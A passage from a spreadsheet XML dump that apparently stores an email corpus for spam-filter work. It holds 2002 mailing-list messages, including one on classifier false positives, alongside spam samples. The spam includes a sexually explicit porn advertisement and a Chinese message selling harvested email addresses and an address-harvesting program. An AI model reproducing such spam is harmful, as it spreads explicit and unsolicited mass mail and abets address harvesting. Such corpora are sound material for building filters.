     0.01; 'inventing': 0.01; 'jsp': 0.01; 'jsp.': 0.01; 'logic': 0.01;
     'maps': 0.01; 'neo': 0.01; 'newsgroup,': 0.01; 'object': 0.01;
     'popup': 0.01; 'probable': 0.01; 'query': 0.01; 'query,': 0.01;
     'resizes': 0.01; 'servlet': 0.01; 'skip:? 20': 0.01; 'stems':
     0.01; 'subject:JSP': 0.01; 'sucks!': 0.01; 'templating': 0.01;
     'tempted': 0.01; 'url.': 0.01; 'usenet': 0.01; 'usenet,': 0.01;
     'wrote': 0.01; 'x-mailer:mozilla 4.74 [en] (windows nt 5.0; u)':
     0.01; 'zope': 0.01; '#000000;': 0.99; '#cc0000;': 0.99;
     '#ff3300;': 0.99; '#ff6600;': 0.99; '#ffffff;': 0.99; '&amp;copy;':
     0.99; '&amp;gt;': 0.99; '&amp;nbsp;&amp;nbsp;': 0.99; '&amp;quot;no': 0.99;
     '.med': 0.99; '.small': 0.99; '0pt;': 0.99; '0px;': 0.99; '10px;':
     0.99; '11pt;': 0.99; '12px;': 0.99; '18pt;': 0.99; '18px;': 0.99;
     '1pt;': 0.99; '2px;': 0.99; '640;': 0.99; '8pt;': 0.99; '&lt;!--':
     0.99; '&lt;/b&gt;': 0.99; '&lt;/body&gt;': 0.99; '&lt;/head&gt;': 0.99; '&lt;/html&gt;':
     0.99; '&lt;/script&gt;': 0.99; '&lt;/select&gt;': 0.99; '&lt;/span&gt;': 0.99;
     '&lt;/style&gt;': 0.99; '&lt;/table&gt;': 0.99; '&lt;/td&gt;': 0.99; '&lt;/td&gt;&lt;/tr&gt;':
     0.99; '&lt;/tr&gt;': 0.99; '&lt;/tr&gt;&lt;tr': 0.99; '&lt;b&gt;&lt;a': 0.99; '&lt;base':
     0.99; '&lt;body': 0.99; '&lt;br&gt;': 0.99; '&lt;br&gt;&amp;nbsp;': 0.99; '&lt;br&gt;&lt;a':
     0.99; '&lt;br&gt;&lt;span': 0.99; '&lt;font': 0.99; '&lt;form': 0.99; '&lt;head&gt;':
     0.99; '&lt;html&gt;': 0.99; '&lt;img': 0.99; '&lt;input': 0.99; '&lt;meta': 0.99;
     '&lt;option': 0.99; '&lt;p&gt;': 0.99; '&lt;p&gt;a': 0.99; '&lt;script&gt;': 0.99;
     '&lt;select': 0.99; '&lt;span': 0.99; '&lt;style&gt;': 0.99; '&lt;table': 0.99;
     '&lt;td': 0.99; '&lt;td&gt;': 0.99; '&lt;td&gt;&lt;/td&gt;': 0.99; '&lt;td&gt;&lt;img': 0.99;
     '&lt;tr': 0.99; '&lt;tr&gt;': 0.99; '&lt;tr&gt;&lt;td': 0.99; '&lt;tr&gt;&lt;td&gt;&lt;img': 0.99;
     'absolute;': 0.99; 'align="left"': 0.99; 'align=center': 0.99;
     'align=left': 0.99; 'align=middle': 0.99; 'align=right': 0.99;
     'align=right&gt;': 0.99; 'alt=""': 0.99; 'bold;': 0.99; 'border=0':
     0.99; 'border=0&gt;': 0.99; 'color:': 0.99; 'colspan=2': 0.99;
     'colspan=2&gt;': 0.99; 'colspan=4': 0.99; 'face="arial"': 0.99;
     'font-family:': 0.99; 'font-size:': 0.99; 'font-weight:': 0.99;
     'footer': 0.99; 'for&lt;br&gt;': 0.99; 'fucking&lt;br&gt;': 0.99;
     'height="1"': 0.99; 'height="16"': 0.99; 'height=1': 0.99;
     'height=12': 0.99; 'height=125': 0.99; 'height=17': 0.99;
     'height=18': 0.99; 'height=21': 0.99; 'height=4': 0.99;
     'height=57': 0.99; 'height=60': 0.99; 'height=8': 0.99;
     'hspace=0': 0.99; 'http0:g': 0.99; 'http0:web2': 0.99; 'http1:0':
     0.99; 'http1:ads': 0.99; 'http1:d': 0.99; 'http1:page': 0.99;
     'http1:site': 0.99; 'http&gt;1:article': 0.99; 'http&gt;1:back': 0.99;
     'http&gt;1:com': 0.99; 'http&gt;1:d': 0.99; 'http&gt;1:gif': 0.99;
     'http&gt;1:go': 0.99; 'http&gt;1:group': 0.99; 'http&gt;1:http': 0.99;
     'http&gt;1:post': 0.99; 'http&gt;1:ps': 0.99; 'http&gt;1:site': 0.99;
     'http&gt;1:st': 0.99; 'http&gt;1:title': 0.99; 'http&gt;1:yahoo': 0.99;
     'inc.&lt;/a&gt;': 0.99; 'jobs!': 0.99; 'normal;': 0.99; 'nowrap': 0.99;
     'nowrap&gt;': 0.99; 'nowrap&gt;&lt;font': 0.99; 'padding:': 0.99;
     'rowspan=2': 0.99; 'rowspan=3': 0.99; 'servlets,': 0.99;
     'size=15': 0.99; 'size=35': 0.99; 'skip:&lt; 10': 0.99; 'skip:b 60':
     0.99; 'skip:h 110': 0.99; 'skip:h 170': 0.99; 'skip:h 200': 0.99;
     'skip:h 240': 0.99; 'skip:h 250': 0.99; 'skip:h 290': 0.99;
     'skip:v 40': 0.99; 'solid;': 0.99; 'text=#000000': 0.99; 'to&lt;br&gt;':
     0.99; 'type="image"': 0.99; 'type="text"': 0.99; 'type=hidden':
     0.99; 'type=image': 0.99; 'type=radio': 0.99; 'type=submit': 0.99;
     'type=text': 0.99; 'valign=top': 0.99; 'valign=top&gt;': 0.99;
     'value=""&gt;': 0.99; 'visibility:': 0.99; 'width:': 0.99;
     'width="33"': 0.99; 'width=1': 0.99; 'width=100%': 0.99;
     'width=100%&gt;': 0.99; 'width=12': 0.99; 'width=125': 0.99;
     'width=130': 0.99; 'width=137': 0.99; 'width=2': 0.99; 'width=20':
     0.99; 'width=25': 0.99; 'width=4': 0.99; 'width=468': 0.99;
     'width=6': 0.99; 'width=72': 0.99; 'works&lt;br&gt;': 0.99
 The second f-p had the same structure (and sender :-); the third f-p
 had the same structure and a different sender.  Ditto the fifth, sixth.  (Not posting clues for
 brevity.)
 The fourth was different: plaintext with one very short sentence and a
 URL.  Clues:
    300 1.00 S 'from:email addr:digicool': 0.01; 'http1:news': 0.24;
    'from:email addr:com&gt;': 0.32; 'from:tres': 0.50; 'http&gt;1:1114digi':
    0.50; 'proto:http': 0.50; 'subject:Geeks': 0.50; 'x-mailer:mozilla
    4.75 [en] (x11; u; linux 2.2.14-5.0smp i686)': 0.50; 'take': 0.54;
    'bool:noorg': 0.61; 'http0:com': 0.66; 'skip:h 50': 0.83;
    'http&gt;1:htm': 0.90; 'subject:Software': 0.96; 'http&gt;1:business':
    0.99; 'http&gt;1:local': 0.99; 'subject:firm': 0.99; 'us:': 0.99
 The seventh was similar.
 I scanned a bunch more until I got bored, and most of them were either
 of the first form (brief text with URL followed by quoted HTML from
 website) or the second (brief text with one or more URLs).
 It's up to you to decide what to call this, but I think these are none
 of your #1, #2 or #3 (they're close to #3, but all are multipart/mixed
 rather than multipart/alternative).
 &gt; &gt; So I guess I'll have to retrain it (yes, you told me so :-).
 &gt; 
 &gt; That would be a different experiment.  I'm certainly curious to see whether
 &gt; Jeremy's much-worse-than-mine error rates are typical or aberrant.
 It's possible that the corpus you've trained on is more homogeneous
 than you thought.
 --Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: traceback in new exmh
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-1249285507P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Scott Lipcon &lt;slipcon@mercea.net&gt;
 &gt; Date:  Mon, 23 Sep 2002 22:35:05 -0400
 &gt;
 &gt; The speed is a problem for sure - It takes a long time to do the
 &gt; rescanning of sequences (I associate it with hitting the 'flist'
 &gt; button, or when my background flist goes off).    I'm running on a
 &gt; pretty fast system (Athlon 1700+, 512Mb RAM, 10k RPM ultra SCSI disk)
 &gt; and hitting flist used to take no more than a second.  The big
 &gt; difference might just be perception, because the the old code just
 &gt; updated all the folders (count + color) all at once, instead of making
 &gt; it look like there is 0 unseen, then counting its way back up.  
 &gt; 
 &gt; I doubt I'll have much time in the immediate future to hack at this,
 &gt; but if I do - can you suggest areas that might be the best to
 &gt; optimize?   If not, do you think we can put in some preferences to
 &gt; disable some of the more intensive features?   I'd rather disable all
 &gt; the sequence support (except unseen, of course) and have reasonable
 &gt; speed.   I suspect people on slow machines would find the current
 &gt; state unusable.
 If I knew where the problem was, I'd fix it myself.
 Finding it is probably more work than the actual fix.
 &gt; &gt; 
 &gt; &gt; This is because of your Hook_MsgShow_update_unseen which is calling a fun
 &gt; ctio
 &gt; &gt; n 
 &gt; &gt; which no longer exists.
 &gt; &gt; 
 &gt; &gt; I suspect you need
 &gt; &gt; 	Seq_Del $exmh(folder) unseen $msgid
 &gt; &gt; now instead of 
 &gt; &gt; 	Mh_MarkSeen $exmh(folder) $msgid
 &gt; &gt; 
 &gt; 
 &gt; Thanks.  I'm not sure I'll need it with the new sequence code, but I
 &gt; might.  Does your new code commit sequences immediately?  The old code
 &gt; didn't, so I put that in to help keep my mh and exmh windows in sync.
 Yes it does.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-1249285507P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9kKD/K9b4h5R0IUIRAp9DAJsF2W+5cvbayu3szYhYW7TUdAb64QCfT3/t
 vgMbAAyyOjJW465cwD6wpfk=
 =0Rwl
 -----END PGP SIGNATURE-----
 --==_Exmh_-1249285507P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Collision of hashes?
</t>
  </si>
  <si>
    <t xml:space="preserve">The following was personal correspondence between two people.  I can't
 fathom how Razor thinks it is spam:
 &gt;
 &gt; We are struggling with the decisions related to wether or not to
 &gt; go ahead with our plans to purchase an OCR and forms
 &gt; scanning solution.
 &gt;
 &gt; An outside consultant mentioned that he had heard that not to
 &gt; long ago you folks were considering implementing OCR
 &gt; technology to reduce data entry costs and improve efficiency.
 &gt; If you could let us know if you did move foreward with any
 &gt; plans in that direction it would be of great help to us. May I ask
 &gt; what initialy prompted you to consider OCR? Did you decide it
 &gt; could help your compamy? What software did you go with?
 &gt; Would you recomend we take a look at it?
 &gt; At present we are still planning to continue our research until
 &gt; we decide which OCR system best suits our needs, then
 &gt; implement it quickly.
 &gt;
 &gt; If you are just starting to consider this
 &gt; technology feel free to stay in touch. We will let you know what
 &gt; we decide on and if it works for us.
 &gt;
 &gt; If you cannot advise on this please forward this E-mail to the
 &gt; proper individual in your company who might be able to help with
 &gt; this.
 &gt; Thanks,
 &gt; Jay
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Time Share
</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in Renting or Selling your
 Timeshare or Vacation Membership?
 We can help!
 For a FREE consultation, simply reply
 with your name and telephone number.
 Also include the name of your resort.
 We will be in touch with you shortly!
 	     Have a great day!  
 Removal instructions:
 *************************
 To be removed from this list please reply with "remove" in the subject.																																						
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: /home/dude
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 some time now the following messages were haunting me:
      automount[11593]: attempting to mount entry /home/dude
 It just came to my attention, that only freshrpm benefitting hosts showed this
 up. I grepped through the binaries and found referrences to /home/dude.
 # grep /home/dude /usr/bin/*
 Binary file /usr/bin/aaxine matches
 Binary file /usr/bin/gentoo matches
 Binary file /usr/bin/gphoto2 matches
 Binary file /usr/bin/gtkam matches
 ...
 I am now relaxed again ;), and pass this info on. Probably Matthias Saou
 himself is "dude", and some package has hardwired a path in his build
 directory. It would be nice to find out which and fix it, but I am using too
 many of the freshrpm suite to narrow it down.
 Regards, Axel.
 -- 
 Axel.Thimm@physik.fu-berlin.de
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Stickiest Faces Ever!!!!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;Shoot your wad all over her face.&lt;br&gt;
 These Girls love to suck cock and lucky for you,&lt;br&gt;
 they love to &lt;b&gt;&lt;font color="#FF0000"&gt;Suck Cock&lt;/font&gt;&lt;/b&gt; while our cameras Are Rolling.&lt;br&gt;
 "We have the nastiest &lt;b&gt;&lt;font color="#FF0000"&gt;Cum Sucking Sluts&lt;/font&gt;&lt;/b&gt; 
 Available Anywhere!"&lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;&lt;font size="5"&gt;&lt;a href="http://1.betahost.net/site4/"&gt;CLICK HERE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font size="2"&gt;YOU MUST BE AT LEAST 18 TO ENTER!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size="2"&gt;=============================================================&lt;br&gt;
 To be removed from our "in house" mailing list &lt;a href="http://1.betahost.net/site4/takemeoff.html"&gt;CLICK HERE&lt;/a&gt;&lt;br&gt;
 and you will automatically be removed from future mailings.&lt;br&gt;
 &lt;br&gt;
 You have received this email by either requesting more information&lt;br&gt;
 on one of our sites or someone may have used your email address.&lt;br&gt;
 If you received this email in error, please accept our apologies.&lt;br&gt;
 =============================================================&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-08-20
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 Call for Perl Monger T-Shirts at YAPC::Europe
     posted by ziggy on Monday August 19, @08:53 (yapce)
     http://use.perl.org/article.pl?sid=02/08/19/1254219
 This Week on perl5-porters (11-18 August 2002)
     posted by pudge on Monday August 19, @10:12 (summaries)
     http://use.perl.org/article.pl?sid=02/08/19/1230217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</si>
  <si>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[use Perl] Headlines for 2002-07-20
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 Last Call for Papers for YAPC::Europe::2002
     posted by pudge on Friday July 19, @03:30 (yapce)
     http://use.perl.org/article.pl?sid=02/07/18/1430255
 Perl 5.8.0 Released
     posted by hfb on Friday July 19, @09:29 (releases)
     http://use.perl.org/article.pl?sid=02/07/19/038259
 Parrot 0.0.7 Released
     posted by pudge on Friday July 19, @13:40 (parrot)
     http://use.perl.org/article.pl?sid=02/07/19/1346238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</si>
  <si>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use new apt to do null to RH8 upgrade?
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou (matthias@egwn.net) wrote*:
 &gt;As Red Hat does, I really don't recommend trying to upgrade between betas
 &gt;or from a beta to a final release either. Simply backup your /home, /etc
 &gt;(and /root and/or /usr/local/ if needed) then reinstall cleanly, it'll
 &gt;probably save a few hassles and you'll get the cleanest possible system ;-)
 &gt;
 I think this is probably the best way, because I think (maybe) with upgrading you
 do not always automatically get the latest feature enabled in some config file
 because RH would rather take it easy and not update that config file (you get a
 rpmnew instead of rpmsaved file) so they get less calls to support that way.
 Anyway, I have tons of media files in /home/* probably 5 to 10 gigs at least, my
 laptop's CDROM takes 700MB at a time (obviously) and compressing media files is
 dumb because they are already compressed. Dumb question: how to backup huge data?
 Network backup to another box? I do not have a box with a tape drive, but maybe box
 with a large HD with much free space could take the backup (oops, I do not have a
 space computer with a large HD with much free space).
 These media files are backed up - ON THE CD'S THEY CAME FROM! Yes I learned that
 used CDs make inexpensive backup copy on the shelf. I do not want to re-rip all
 this crap again.
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Switcher
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/02.html#switcher
 Date: 2002-10-02T09:32:48-05:00
 _Phil Ringnalda_, in an unrelated discussion about RSS namespaces[1]: 
 &amp;#8220;Looks like [yet another person] decided to switch to NetNewsWire Lite. 
 Does it come with crack, or what?&amp;#8221;
 [1] http://groups.yahoo.com/group/RSS2-Support/message/110
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Executive pay leaps ahead 17%
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8535461,215/
 Date: 2002-10-04T02:39:04+01:00
 Executive pay has once again outpaced average earnings, climbing an average of 
 17% last year.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 7000  ַؼۣ
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear cypherpunks =2C
 =3CBODY bgColor=3D#ffccff=3E
 =3CBLOCKQUOTE 
 style=3D=22BORDER-LEFT=3A #000000 2px solid=3B MARGIN-LEFT=3A 5px=3B MARGIN-RIGHT=3A 0px=3B PADDING-LEFT=3A 5px=3B PADDING-RIGHT=3A 0px=22=3E
   =A1=A1
   =3CTABLE width=3D=22717=22=3E
     =3CTBODY=3E
     =3CTR=3E
       =3CTD width=3D=2224=22=3E=3C=2FTD=3E
       =3CTD bgColor=3D#b8ecff borderColor=3D#0000ff width=3D=22651=22=3E=3CFONT color=3D#ff0000 
         face=3D=22Arial Black=22 
         size=3D6=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B=3C=2FFONT=3E 
         =3Cdiv align=3D=22left=22=3E
           =3Cfont face=3D=22=BA=DA=CC=E5=22 size=3D=225=22=3E=3Cfont color=3D=22#0000ff=22 new roman=3E&amp;nbsp=3B7000=3C=2Ffont=3E=3Cfont color=3D=22#0000ff=22=3E=CD=F2=A3=A8=3C=2Ffont=3E=3Cfont color=3D=22#FF0000=22=3E=BE=F8=CE=DE=D6=D8=B8=B4=3C=2Ffont=3E=3Cfont color=3D=22#0000ff=22=3E=A3=A9=3C=2Ffont=3E=3Cfont color=3D=22#0000ff=22 New Roman=3EEMAIL=3C=2Ffont=3E=3Cfont color=3D=22#0000ff=22=3E=B5=D8=D6=B7=CA=FD=BE=DD=BF=E2=3C=2Ffont=3E=3Cfont color=3D=22#0000ff=22 New Roman=3E=2C=3C=2Ffont=3E=3Cfont color=3D=22#0000ff=22=3E=B4=F3=CC=D8=BC=DB=A3=BA=3C=2Ffont=3E=3Cfont color=3D=22#FF0000=22=3E=3Cfont new roman=3E150=3C=2Ffont=3E=D4=AA=3C=2Ffont=3E=3C=2Ffont=3E=3Cfont color=3D=22#FF0000=22 size=3D=226=22 face=3D=22=C1=A5=CA=E9=22=3E!!!=3C=2Ffont=3E
         =3C=2Fdiv=3E
         =3Cdiv align=3D=22left=22=3E
           =3Cfont color=3D=22#0000ff=22 face=3D=22=BA=DA=CC=E5=22 size=3D=225=22=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B=3C=2Ffont=3E=3Cfont face=3D=22=BA=DA=CC=E5=22 size=3D=225=22=3E=3Cfont color=3D=22#0000ff=22=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B 
           =A3=A8=B0=FC=C0=A8=CC=D8=BF=EC=D7=A8=B5=DD=B7=D1=BA=CD=B9=E2=C5=CC=B7=D1=A3=A9=3C=2Ffont=3E=3Cfont color=3D=22#000000=22=3E=3Cbr=3E 
           =3C=2Ffont=3E=3C=2Ffont=3E 
           =3Cb=3E=3Cfont face=3D=22=CB=CE=CC=E5=22 size=3D=224=22 color=3D=22#008000=22=3E&amp;nbsp=3B&amp;nbsp=3B  
           =3C=2Ffont=3E=3C=2Fb=3E  
           =3Cfont face=3D=22=BF=AC=CC=E5=5FGB2312=22 size=3D=224=22 color=3D=22#008000=22=3E=C4=FA=CE=DE=D0=EB=CD=B6=C8=EB=BE=DE=B6=EE=B5=C4=B9=E3=B8=E6=B7=D1=3Cfont New Roman=3E=2C=3C=2Ffont=3E=C4=FA=CE=DE=D0=EB=B5=A3=D0=C4=C4=FA=B5=C4=B2=FA=C6=B7=C3=BB=C8=CB=D6=AA=B5=C0=A3=AC=D3=B5=D3=D0=C1=CB=3Cfont new roman=3E7000=3C=2Ffont=3E=CD=F2=3Cfont New Roman=3EE-mail=3C=2Ffont=3E=B5=D8=D6=B7=3Cfont New Roman=3E=2C=3C=2Ffont=3E=C4=FA=BE=CD=D3=B5=D3=D0=C1=CB=3Cfont new roman=3E7000=3C=2Ffont=3E=CD=F2=B5=C4=C7=B1=D4=DA=BF=CD=BB=A7=C8=BA=3Cfont New Roman=3E=2E=3C=2Ffont=3E=C4=FA=BF=C9=CF=F2=B9=E3=B4=F3=B5=C4=BF=CD=BB=A7=D0=FB=B4=AB=D7=D4=BC=BA=B5=C4=B9=AB=CB=BE=A3=AC=CF=FA=CA=DB=D7=D4=BC=BA=B5=C4=C9=CC=C6=B7=3Cfont New Roman=3E=2C=3C=2Ffont=3E=D1=B0=D5=D2=B4=FA=C0=ED=C9=CC=A3=AC=D1=B0=C7=F3=C9=CC=D2=B5=BA=CF=D7=F7=BB=EF=B0=E9=3Cfont New Roman=3E=2C=3C=2Ffont=3E=D1=B8=CB=D9=CC=E1=B8=DF=CD=F8=D5=BE=B5=C4=D6=AA=C3=FB=B6=C8=3Cfont New Roman=3E=2C=3C=2Ffont=3E=C8=C3=C4=FA=B5=C4=B9=AB=CB=!
  BE=A3=AC=C4=FA=B5=C4=B2=FA=C6=B7=A3=AC=C4=FA=B5=C4=C1=BC=BA=C3=D0=CE=CF=F3=D4=DA=BB=A5=C1=AA=CD=F8=C9=CF=BF=EC=CB=D9=D5=B9=CF=D6=A3=AC=C8=C3=B3=C9=C7=A7=C9=CF=CD=F2=B5=C4=BF=CD=BB=A7=D3=EB=C4=FA=BD=A8=C1=A2=BA=CF=D7=F7=B9=D8=CF=B5=A1=A3=3C=2Ffont=3E
         =3C=2Fdiv=3E
         =3Cdiv align=3D=22left=22=3E
           =A1=A1
         =3C=2Fdiv=3E
         =3Cdiv align=3D=22left=22=3E
           =3Cfont face=3D=22=BF=AC=CC=E5=5FGB2312=22 size=3D=224=22 color=3D=22#008000=22=3E&amp;nbsp=3B&amp;nbsp=3B 
           =B1=BE=D5=BE=D7=A8=D2=B5=B4=D3=CA=C2=C9=CC=D2=B5=B5=E7=D7=D3=D3=CA=BC=FE=B7=FE=CE=F1=D2=B5=CE=F1=A3=AC=CE=AA=C1=CB=BD=E2=BE=F6=B4=F3=BC=D2=CB=D1=BC=AFE-Mail=B5=D8=D6=B7=B5=C4=C0=A7=C4=D1=A3=AC=CF=D6=BD=AB=B9=AB=CB=BEE-Mail=B5=D8=D6=B7=BF=E2=B9=AB=BF=AA=B3=F6=CA=DB=A3=AC=C1=ED=BF=AA=D5=B9=B9=E3=B8=E6=D3=CA=BC=FE=B4=B4=D2=E2=A1=A2=D6=C6=D7=F7=A1=A2=C5=FA=C1=BF=D3=CA=BC=FE=B7=A2=CB=CD=B5=C8=D4=F6=D6=B5=D2=B5=CE=F1=A1=A3=BF=C9=C3=E2=B7=D1=CA=D4=D3=C3=A3=AC=C2=FA=D2=E2=BA=F3=B8=B6=BF=EE=A3=AC=B2=A2=D3=D0=B6=E0=D6=D6=BA=CF=D7=F7=B7=BD=CA=BD=B9=A9=C4=FA=D1=A1=D4=F1=A1=A3=3Cbr=3E
           &amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B =B1=BE=D5=BEE-Mail=B5=D8=D6=B7=BF=E2=BE=F9=D3=C9=D7=A8=D2=B5=C8=CB=D4=B1=CA=D5=BC=AF=A1=A2=D1=E9=D6=A4=A3=AC=B2=A2=B2=BB=B6=CF=B8=FC=D0=C2=A3=AC=B1=A3=D6=A4 
           =C6=E4=D5=E6=CA=B5=D3=D0=D0=A7=A1=A3=3C=2Ffont=3E
         =3C=2Fdiv=3E
         =3Cul=3E  
   =3CDIV align=3Dleft=3E=3Cfont face=3D=22=BA=DA=CC=E5=22=3E=3Cfont color=3D=22#0000FF=22 size=3D=224=22=3E=3Ca href=3D=22http=3A=2F=2Fwww=2Ewldbiz=2Ecom=2Fsoft=2FEmailScan=2Ezip=22=3E=D3=CA=BC=FE=B4=FE=B2=B6=C8=ED=BC=FE=3C=2Fa=3E 
     =CA=DB=BC=DB=BD=F6=CE=AA=3C=2Ffont=3E=3CFONT color=3D#0000FF size=3D2=3E=A3=BA=3C=2FFONT=3E=3C=2Ffont=3E=3Cfont face=3D=22=BA=DA=CC=E5=22 size=3D=223=22 color=3D=22#FF00FF=22=3E=3Cb=3E=C8=CB=C3=F1=B1=D2=3C=2Fb=3E=3C=2Ffont=3E=3Cb=3E=3Cfont roman new face=3D=22=BA=DA=CC=E5=22 color=3D=22#FF00FF=22 size=3D=225=22=3E98=3C=2Ffont=3E=3C=2Fb=3E=3Cfont face=3D=22=BA=DA=CC=E5=22 size=3D=223=22 color=3D=22#FF00FF=22=3E=3Cb=3E=D4=AA=A1=A3=A3=A8=3C=2Fb=3E=BB=B6=D3=AD=C3=E2=B7=D1=CB=F7=C8=A1=CA=D4=D3=C3=B0=E6=B1=BE=3Cb=3E=A3=A9=3C=2Fb=3E=3C=2Ffont=3E=3C=2FDIV=3E
   =3CDIV align=3Dleft=3E=3CFONT color=3D#000000 face=3D=CB=CE=CC=E5 size=3D2=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B  
     =3C=2FFONT=3E=3Cfont size=3D=224=22 color=3D=22#008000=22 face=3D=22=BF=AC=CC=E5=5FGB2312=22=3E=BF=C9=B4=D3=CD=F8=D5=BE=A3=AC=CD=F8=D2=B3=D6=D0=CA=D5=BC=AFE-mail=B5=D8=D6=B7=A3=AC=D2=B2=BF=C9=D2=D4=B8=F9=BE=DD=B9=D8=BC=FC=B4=CA=D4=DA=B8=F7=B4=F3=CB=D1=CB=F7=D2=FD=C7=E6=D6=D0=CA=D5=BC=AF=B7=FB=BA=CF=D2=AA=C7=F3=B5=C4=D3=CA=BC=FE=B5=D8=D6=B7=A3=AC=B6=E0=CF=DF=B3=CC=B9=A4=D7=F7=A1=A3=3C=2Ffont=3E=3Cfont face=3D=22=CB=CE=CC=E5=22 size=3D=224=22 color=3D=22#008000=22=3E=3CBR=3E=3C=2Ffont=3E=3C=2FDIV=3E
   =3CDIV align=3Dleft=3E=3Cb=3E=3Cfont face=3D=22=BF=AC=CC=E5=5FGB2312=22 size=3D=224=22 color=3D=22#FF00FF=22=3E=C8=ED=BC=FE=CF=C2=D4=D8=A3=BA=3C=2Ffont=3E=3C=2Fb=3E=3Ca href=3D=22http=3A=2F=2Fwww=2Ewldbiz=2Ecom=2Fsoft=2FEmailScan=2Ezip=22=3E=3Cfont color=3D=22#0000ff=22 roman new size=3D=224=22 face=3D=22Arial=22=3Ehttp=3A=2F=2Fwww=2Ewldbiz=2Ecom=2Fsoft=2FEmailScan=2Ezip=3C=2Ffont=3E=3C=2Fa=3E=3Cfont face=3D=22=BF=AC=CC=E5=5FGB2312=22 size=3D=224=22 color=3D=22#FF00FF=22=3E=3CFONT 
   color=3D#0000ff face=3DTimes size=3D2 Roman New=3E  
     =3C=2FFONT=3E=3Cb=3E=A3=A8=D2=F2=CF=C2=D4=D8=B5=C4=C8=CB=CA=FD=BD=CF=B6=E0=A3=AC=C7=EB=B6=E0=CB=A2=D0=C2=BC=B8=B4=CE=A3=BB=BB=F2=B7=A2=3C=2Ffont=3E=3Cfont roman new face=3D=22Arial=22 size=3D=224=22 color=3D=22#FF00FF=22=3Eemail=3C=2Ffont=3E=3Cfont face=3D=22=BF=AC=CC=E5=5FGB2312=22 size=3D=224=22 color=3D=22#FF00FF=22=3E=C3=E2=B7=D1=CB=F7=C8=A1=A3=A9=3C=2Ffont=3E=3C=2Fb=3E=3CFONT color=3D#000000 face=3D=CB=CE=CC=E5 size=3D2=3E=3CBR=3E=3C=2FDIV=3E
         =3C=2FFONT=3E
   =3CDIV align=3Dleft=3E=3Cfont face=3D=22=BF=AC=CC=E5=5FGB2312=22 size=3D=224=22 color=3D=22#008000=22=3E=3Cb=3E&amp;nbsp=3B&amp;nbsp=3B  
